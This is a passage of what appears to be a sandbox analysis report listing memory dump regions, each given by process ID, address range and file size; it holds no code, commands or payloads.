                                                                                                                                                                                                                                                                        • memory/1240-180-0x0000000002EE8000-0x0000000002EF1000-memory.dmp
                                                                                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                                                                                          36KB

                                                                                                                                                                                                                                                                        • memory/1240-208-0x0000000000400000-0x0000000002C68000-memory.dmp
                                                                                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                                                                                          40.4MB

                                                                                                                                                                                                                                                                        • memory/2448-192-0x0000000000670000-0x0000000000671000-memory.dmp
                                                                                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                                                                                          4KB

                                                                                                                                                                                                                                                                        • memory/2812-209-0x0000000000400000-0x0000000002CC4000-memory.dmp
                                                                                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                                                                                          40.8MB

                                                                                                                                                                                                                                                                        • memory/2812-173-0x0000000002D78000-0x0000000002DDD000-memory.dmp
                                                                                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                                                                                          404KB

                                                                                                                                                                                                                                                                        • memory/2812-205-0x00000000049B0000-0x0000000004A4D000-memory.dmp
                                                                                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                                                                                          628KB

                                                                                                                                                                                                                                                                        • memory/2812-204-0x0000000002D78000-0x0000000002DDD000-memory.dmp
                                                                                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                                                                                          404KB

                                                                                                                                                                                                                                                                        • memory/2916-313-0x0000000000400000-0x0000000000420000-memory.dmp
                                                                                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                                                                                          128KB

                                                                                                                                                                                                                                                                        • memory/3020-222-0x0000000003140000-0x0000000003156000-memory.dmp
                                                                                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                                                                                          88KB

                                                                                                                                                                                                                                                                        • memory/3032-215-0x00000000733F0000-0x0000000073BA0000-memory.dmp
                                                                                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                                                                                          7.7MB

                                                                                                                                                                                                                                                                        • memory/3032-225-0x0000000005330000-0x000000000543A000-memory.dmp
                                                                                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                                                                                          1.0MB

                                                                                                                                                                                                                                                                        • memory/3032-213-0x0000000000400000-0x000000000041E000-memory.dmp
                                                                                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                                                                                          120KB

                                                                                                                                                                                                                                                                        • memory/3032-223-0x0000000004F60000-0x0000000005578000-memory.dmp
                                                                                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                                                                                          6.1MB

                                                                                                                                                                                                                                                                        • memory/3032-218-0x0000000004FE0000-0x0000000004FF2000-memory.dmp
                                                                                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                                                                                          72KB

                                                                                                                                                                                                                                                                        • memory/3032-221-0x0000000005040000-0x000000000507C000-memory.dmp
                                                                                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                                                                                          240KB

                                                                                                                                                                                                                                                                        • memory/3032-216-0x0000000005580000-0x0000000005B98000-memory.dmp
                                                                                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                                                                                          6.1MB

                                                                                                                                                                                                                                                                        • memory/3344-196-0x0000000004CF0000-0x0000000004CF1000-memory.dmp
                                                                                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                                                                                          4KB

                                                                                                                                                                                                                                                                        • memory/3344-195-0x00000000733F0000-0x0000000073BA0000-memory.dmp
                                                                                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                                                                                          7.7MB

                                                                                                                                                                                                                                                                        • memory/3344-186-0x0000000004B00000-0x0000000004B76000-memory.dmp
                                                                                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                                                                                          472KB

                                                                                                                                                                                                                                                                        • memory/3344-183-0x00000000002D0000-0x000000000033A000-memory.dmp
                                                                                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                                                                                          424KB

                                                                                                                                                                                                                                                                        • memory/3344-200-0x00000000052B0000-0x0000000005854000-memory.dmp
                                                                                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                                                                                          5.6MB

                                                                                                                                                                                                                                                                        • memory/3344-194-0x0000000004AD0000-0x0000000004AEE000-memory.dmp
                                                                                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                                                                                          120KB

                                                                                                                                                                                                                                                                        • memory/3484-190-0x00007FFC07820000-0x00007FFC082E1000-memory.dmp
                                                                                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                                                                                          10.8MB

                                                                                                                                                                                                                                                                        • memory/3484-191-0x00000000017D0000-0x00000000017D2000-memory.dmp
                                                                                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                                                                                          8KB

                                                                                                                                                                                                                                                                        • memory/3484-178-0x0000000000FB0000-0x0000000000FE8000-memory.dmp
                                                                                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                                                                                          224KB

                                                                                                                                                                                                                                                                        • memory/3628-324-0x0000000000400000-0x0000000000420000-memory.dmp
                                                                                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                                                                                          128KB

                                                                                                                                                                                                                                                                        • memory/3644-274-0x00000000024A0000-0x0000000002500000-memory.dmp
                                                                                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                                                                                          384KB

                                                                                                                                                                                                                                                                        • memory/3716-286-0x0000000000184000-0x0000000000186000-memory.dmp
                                                                                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                                                                                          8KB

                                                                                                                                                                                                                                                                        • memory/3716-285-0x0000000002750000-0x0000000002751000-memory.dmp
                                                                                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                                                                                          4KB

                                                                                                                                                                                                                                                                        • memory/3716-272-0x00000000023D0000-0x0000000002430000-memory.dmp
                                                                                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                                                                                          384KB

                                                                                                                                                                                                                                                                        • memory/3864-189-0x0000000000400000-0x000000000046D000-memory.dmp
                                                                                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                                                                                          436KB

                                                                                                                                                                                                                                                                        • memory/3864-170-0x0000000000400000-0x000000000046D000-memory.dmp
                                                                                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                                                                                          436KB

                                                                                                                                                                                                                                                                        • memory/4060-270-0x00000000759A0000-0x00000000759EC000-memory.dmp
                                                                                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                                                                                          304KB

                                                                                                                                                                                                                                                                        • memory/4060-251-0x00000000733F0000-0x0000000073BA0000-memory.dmp
                                                                                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                                                                                          7.7MB

                                                                                                                                                                                                                                                                        • memory/4060-242-0x0000000002EB0000-0x0000000002EF6000-memory.dmp
                                                                                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                                                                                          280KB

                                                                                                                                                                                                                                                                        • memory/4060-249-0x0000000000C90000-0x0000000000E44000-memory.dmp
                                                                                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                                                                                          1.7MB

                                                                                                                                                                                                                                                                        • memory/4060-245-0x0000000002F10000-0x0000000002F11000-memory.dmp
                                                                                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                                                                                          4KB

                                                                                                                                                                                                                                                                        • memory/4060-269-0x0000000002F30000-0x0000000002F31000-memory.dmp
                                                                                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                                                                                          4KB

                                                                                                                                                                                                                                                                        • memory/4060-260-0x0000000076930000-0x0000000076EE3000-memory.dmp
                                                                                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                                                                                          5.7MB

                                                                                                                                                                                                                                                                        • memory/4060-250-0x0000000000C90000-0x0000000000E44000-memory.dmp
                                                                                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                                                                                          1.7MB

                                                                                                                                                                                                                                                                        • memory/4060-259-0x0000000000C90000-0x0000000000E44000-memory.dmp
                                                                                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                                                                                          1.7MB

                                                                                                                                                                                                                                                                        • memory/4060-248-0x0000000077940000-0x0000000077B55000-memory.dmp
                                                                                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                                                                                          2.1MB

                                                                                                                                                                                                                                                                        • memory/4060-252-0x0000000000C90000-0x0000000000E44000-memory.dmp
                                                                                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                                                                                          1.7MB

                                                                                                                                                                                                                                                                        • memory/4060-255-0x0000000071D30000-0x0000000071DB9000-memory.dmp
                                                                                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                                                                                          548KB

                                                                                                                                                                                                                                                                        • memory/4116-271-0x0000000002450000-0x00000000024B0000-memory.dmp
                                                                                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                                                                                          384KB

                                                                                                                                                                                                                                                                        • memory/4148-246-0x000000000063E000-0x00000000006AA000-memory.dmp
                                                                                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                                                                                          432KB

                                                                                                                                                                                                                                                                        • memory/4156-253-0x0000000000760000-0x000000000078C000-memory.dmp
                                                                                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                                                                                          176KB

                                                                                                                                                                                                                                                                        • memory/4156-265-0x0000000002AB0000-0x0000000002AB1000-memory.dmp
                                                                                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                                                                                          4KB

                                                                                                                                                                                                                                                                        • memory/4156-268-0x00000000733F0000-0x0000000073BA0000-memory.dmp
                                                                                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                                                                                          7.7MB

                                                                                                                                                                                                                                                                        • memory/4180-302-0x0000000000400000-0x0000000000420000-memory.dmp
                                                                                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                                                                                          128KB

                                                                                                                                                                                                                                                                        • memory/4284-256-0x00000000029B0000-0x00000000029B1000-memory.dmp
                                                                                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                                                                                          4KB

                                                                                                                                                                                                                                                                        • memory/4284-254-0x0000000002440000-0x00000000024A0000-memory.dmp
                                                                                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                                                                                          384KB

                                                                                                                                                                                                                                                                        • memory/4284-281-0x0000000002990000-0x0000000002991000-memory.dmp
                                                                                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                                                                                          4KB

                                                                                                                                                                                                                                                                        • memory/4284-283-0x00000000029D0000-0x00000000029D1000-memory.dmp
                                                                                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                                                                                          4KB

                                                                                                                                                                                                                                                                        • memory/4284-284-0x00000000036A0000-0x00000000036A1000-memory.dmp
                                                                                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                                                                                          4KB

                                                                                                                                                                                                                                                                        • memory/4284-282-0x0000000002A00000-0x0000000002A01000-memory.dmp
                                                                                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                                                                                          4KB

                                                                                                                                                                                                                                                                        • memory/4284-280-0x00000000029A0000-0x00000000029A1000-memory.dmp
                                                                                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                                                                                          4KB

                                                                                                                                                                                                                                                                        • memory/4284-279-0x00000000029E0000-0x00000000029E1000-memory.dmp
                                                                                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                                                                                          4KB

                                                                                                                                                                                                                                                                        • memory/4284-278-0x0000000002970000-0x0000000002971000-memory.dmp
                                                                                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                                                                                          4KB

                                                                                                                                                                                                                                                                        • memory/4340-273-0x00000000006DD000-0x0000000000704000-memory.dmp
                                                                                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                                                                                          156KB

                                                                                                                                                                                                                                                                        • memory/4340-276-0x00000000020B0000-0x00000000020F4000-memory.dmp
                                                                                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                                                                                          272KB

                                                                                                                                                                                                                                                                        • memory/4340-277-0x0000000000400000-0x000000000048C000-memory.dmp
                                                                                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                                                                                          560KB

                                                                                                                                                                                                                                                                        • memory/4340-275-0x00000000006DD000-0x0000000000704000-memory.dmp
                                                                                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                                                                                          156KB

                                                                                                                                                                                                                                                                        • memory/4348-338-0x0000000000400000-0x0000000000630000-memory.dmp
                                                                                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                                                                                          2.2MB

                                                                                                                                                                                                                                                                        • memory/4416-257-0x00000000007D0000-0x0000000000821000-memory.dmp
                                                                                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                                                                                          324KB

                                                                                                                                                                                                                                                                        • memory/4424-258-0x00000000006F0000-0x00000000006FE000-memory.dmp
                                                                                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                                                                                          56KB

                                                                                                                                                                                                                                                                        • memory/4452-267-0x00000000036B0000-0x00000000036B1000-memory.dmp
                                                                                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                                                                                          4KB

                                                                                                                                                                                                                                                                        • memory/4452-266-0x00000000029E0000-0x00000000029E1000-memory.dmp
                                                                                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                                                                                          4KB

                                                                                                                                                                                                                                                                        • memory/4672-262-0x0000000000320000-0x0000000000334000-memory.dmp
                                                                                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                                                                                          80KB

                                                                                                                                                                                                                                                                        • memory/4672-263-0x00000000733F0000-0x0000000073BA0000-memory.dmp
                                                                                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                                                                                          7.7MB

                                                                                                                                                                                                                                                                        • memory/4672-264-0x0000000004B90000-0x0000000004B91000-memory.dmp
                                                                                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                                                                                          4KB

                                                                                                                                                                                                                                                                        • memory/4968-331-0x0000000000400000-0x0000000000537000-memory.dmp
                                                                                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                                                                                          1.2MB

                                                                                                                                                                                                                                                                        • memory/4968-328-0x0000000000400000-0x0000000000537000-memory.dmp
                                                                                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                                                                                          1.2MB

                                                                                                                                                                                                                                                                        • memory/4968-335-0x0000000000400000-0x0000000000537000-memory.dmp
                                                                                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                                                                                          1.2MB

                                                                                                                                                                                                                                                                        • memory/5064-288-0x0000000000400000-0x0000000000420000-memory.dmp
                                                                                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                                                                                          128KB

                                                                                                                                                                                                                                                                        • memory/5084-290-0x0000000000400000-0x0000000000420000-memory.dmp
                                                                                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                                                                                          128KB